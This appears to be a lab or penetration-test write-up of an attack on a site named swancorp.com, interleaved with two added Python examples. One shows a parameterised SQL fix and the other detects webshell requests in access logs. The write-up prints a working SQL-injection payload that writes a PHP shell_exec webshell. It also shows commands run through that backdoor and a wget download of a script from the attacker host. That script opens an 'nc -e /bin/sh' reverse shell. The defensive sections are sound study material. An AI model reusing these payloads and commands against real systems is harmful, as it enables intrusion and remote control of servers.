- Using the SQL injection in the edit_type.php request to write PHP code into the web directory, used the following query to create a backdoor file called backdoor.php:
  - http://swancorp.com/swancorp/timecards/edit_type.php?type_id=740%20union%20all%20select%20%22%3C?php%20echo%20shell_exec($_GET[%27cmd%27]);?%3E%22%20into%20OUTFILE%20%27/var/www/html/swancorp/backdoor.php%27;#
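The request above works only because three things line up: the type_id value is spliced into the SQL text unparsed, the application's database account holds the MySQL FILE privilege with secure_file_priv not restricting the target directory, and the web root is writable by the database server process. The added example below is not from the paste (which does not show edit_type.php's source); it models the first of these in Python against an in-memory SQLite table whose name and columns are constructed here, and shows the parameterised form that closes it. On MySQL the other two are fixed by revoking FILE from the web account and setting secure_file_priv.

```python
"""Added example, not from the paste: the concatenation flaw behind the
type_id request, beside its parameterised fix. Table and rows are constructed."""
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the timecards database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE timecard_types (type_id INTEGER PRIMARY KEY, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO timecard_types VALUES (?, ?)",
        [(740, "Regular hours"), (741, "Overtime")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, type_id_param: str) -> List[str]:
    """Mirrors the flaw: the raw GET parameter becomes part of the SQL text,
    so anything after the number (UNION ALL SELECT ..., and on MySQL an
    INTO OUTFILE clause) is executed as the query."""
    sql = "SELECT name FROM timecard_types WHERE type_id = " + type_id_param
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn: sqlite3.Connection, type_id_param: str) -> List[str]:
    """Fix: validate the type, then bind the value as a parameter. The driver
    sends the value separately from the SQL text, so it cannot extend the query."""
    if not type_id_param.isdigit():
        raise ValueError("type_id must be a positive integer")  # reject, don't sanitise
    sql = "SELECT name FROM timecard_types WHERE type_id = ?"
    return [row[0] for row in conn.execute(sql, (int(type_id_param),))]


# Constructed marker standing in for the PHP text in the paste's payload.
INJECTED = "740 UNION ALL SELECT 'INJECTED'"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, benign:", vulnerable_lookup(db, "740"))
    print("vulnerable, injected:", vulnerable_lookup(db, INJECTED))
    print("hardened, benign:", hardened_lookup(db, "740"))
    try:
        hardened_lookup(db, INJECTED)
    except ValueError as exc:
        print("hardened, injected: rejected ->", exc)
```

The hardened form rejects rather than escapes: an integer identifier has no legitimate reason to contain anything but digits, and binding it as a parameter means the database never parses user input as SQL.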
- Then used the following requests to the PHP backdoor to get various results:
  - Directory list
    - http://swancorp.com/swancorp/backdoor.php?cmd=ls
    - about.html backdoor.php cache contact.html css evilbackdoor.php fonts images index.html js nagios_exploit.sh portfolio.html sass swancorp.sh timecards
  - Router info
    - http://swancorp.com/swancorp/backdoor.php?cmd=route
    - Kernel IP routing table
      Destination  Gateway      Genmask      Flags  Metric  Ref  Use  Iface
      default      10.10.127.1  0.0.0.0      UG     0       0    0    eth0
      10.10.0.0    *            255.255.0.0  U      0       0    0    eth0
  - Linux version
    - http://swancorp.com/swancorp/backdoor.php?cmd=cat /etc/issue
    - Ubuntu 14.04.5 LTS \n \l
- Using the following commands, first a listener in the host shell and then a request through the target's PHP backdoor, attempted to get a connection from the target system back to the host system:
  - nc -lvp 12345
  - http://swancorp.com/swancorp/backdoor.php?cmd=nc 10.10.127.89 12345
  - root@kali-linux:~# nc -lvp 12345
    listening on [any] 12345 ...
    connect to [10.10.127.89] from swancorp.com [10.10.127.209] 54630
- Made a script file containing the code:
  - #!/bin/sh
    nc.traditional -e /bin/sh 10.10.127.89 12345
- This was to establish a persistent connection between the host and target machines.
- Then used the following PHP backdoor command to have the script downloaded:
  - http://swancorp.com/swancorp/backdoor.php?cmd=wget -P /tmp/ http://10.10.127.89/ncscript.sh
- Verified that the file was successfully transferred to the target system using:
  - http://swancorp.com/swancorp/backdoor.php?cmd=ls /tmp/
  - hsperfdata_tomcat7 index.html ncscript tomcat7-tomcat7-tmp vmware-root
- Then modified the script file's permissions on the target system using:
  - http://swancorp.com/swancorp/backdoor.php?cmd=chmod 777 /tmp/ncscript
- Executed the script using the command:
  - http://swancorp.com/swancorp/backdoor.php?cmd=sh /tmp/ncscript
- Used simple terminal commands to verify that the connection was persistent:
  - whoami
    www-data
  - ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:50:56:b8:1e:8e
              inet addr:10.10.127.209  Bcast:10.10.255.255  Mask:255.255.0.0
              inet6 addr: fe80::250:56ff:feb8:1e8e/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:921352 errors:0 dropped:1113 overruns:0 frame:0
              TX packets:113252 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:124236261 (124.2 MB)  TX bytes:11509356 (11.5 MB)
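Every step on this page leaves a request in the web server's access log: first the INTO OUTFILE query against edit_type.php, then a string of GET requests to backdoor.php carrying a cmd parameter. The added Python below is not part of the paste; it is detection logic a defender could run over such a log, with sample lines constructed in Apache combined-log format to mirror the paste's requests (timestamps and sizes are made up, and the PHP text in the injected payload is replaced by a short marker). The directory listing earlier on the page already shows evilbackdoor.php, nagios_exploit.sh and swancorp.sh beside backdoor.php, so a file-integrity baseline of the web root would have flagged these writes independently of the log.

```python
"""Added example, not from the paste: flag SQL-injection file writes and
webshell command parameters in web access logs. Sample log lines are constructed."""
import re
from typing import Dict, List
from urllib.parse import unquote_plus, urlsplit

# Constructed sample in Apache combined-log format, modelled on the paste's requests.
SAMPLE_LOG = """\
10.10.127.89 - - [12/Mar/2018:14:02:11 +0000] "GET /swancorp/timecards/edit_type.php?type_id=740 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.10.127.89 - - [12/Mar/2018:14:05:43 +0000] "GET /swancorp/timecards/edit_type.php?type_id=740%20union%20all%20select%20%22x%22%20into%20OUTFILE%20%27/var/www/html/swancorp/backdoor.php%27;%23 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.10.127.89 - - [12/Mar/2018:14:06:02 +0000] "GET /swancorp/backdoor.php?cmd=ls HTTP/1.1" 200 211 "-" "Mozilla/5.0"
10.10.127.89 - - [12/Mar/2018:14:09:30 +0000] "GET /swancorp/backdoor.php?cmd=wget%20-P%20/tmp/%20http://10.10.127.89/ncscript.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.127.90 - - [12/Mar/2018:14:10:01 +0000] "GET /swancorp/portfolio.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Injection that writes a file on the server: UNION ... SELECT ... INTO OUTFILE/DUMPFILE
SQLI_FILE_WRITE = re.compile(r"\bunion\b.*\bselect\b.*\binto\s+(out|dump)file\b", re.I | re.S)
# Any UNION-based injection, even without the file write
SQLI_UNION = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
# Parameter names typical of a command-execution webshell
SHELL_PARAMS = {"cmd", "exec", "command"}


def parse_query(query: str) -> Dict[str, List[str]]:
    """Decode a raw query string by hand: parse_qs treats ';' as a separator
    on older Python versions, and the paste's payload contains one."""
    params: Dict[str, List[str]] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def inspect_line(line: str, lineno: int) -> List[Dict[str, object]]:
    """Return one finding per matched rule for a single access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not in the expected format; skip rather than crash
    target = urlsplit(m.group("target"))
    findings: List[Dict[str, object]] = []
    for key, values in parse_query(target.query).items():
        for value in values:
            rule = None
            if SQLI_FILE_WRITE.search(value):
                rule = "sqli-file-write"
            elif SQLI_UNION.search(value):
                rule = "sqli-union"
            if rule:
                findings.append({"line": lineno, "client": m.group("client"),
                                 "rule": rule, "path": target.path,
                                 "param": key, "value": value})
            # A .php script taking a cmd-style parameter is the backdoor pattern above.
            if key.lower() in SHELL_PARAMS and target.path.endswith(".php"):
                findings.append({"line": lineno, "client": m.group("client"),
                                 "rule": "webshell-command", "path": target.path,
                                 "param": key, "value": value})
    return findings


def analyse_log(text: str) -> List[Dict[str, object]]:
    """Run inspect_line over every line of an access log and collect findings."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        findings.extend(inspect_line(line, lineno))
    return findings


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['rule']} from {f['client']} -> "
              f"{f['path']} [{f['param']}={str(f['value'])[:60]}]")
```

Decoding the query string before matching matters: the paste's payload is percent-encoded on the wire, so a rule that searched the raw log line for "into outfile" would miss it. The webshell rule fires on the parameter name alone, so it catches the later `chmod`, `sh` and `nc` requests as well as the `ls` shown here.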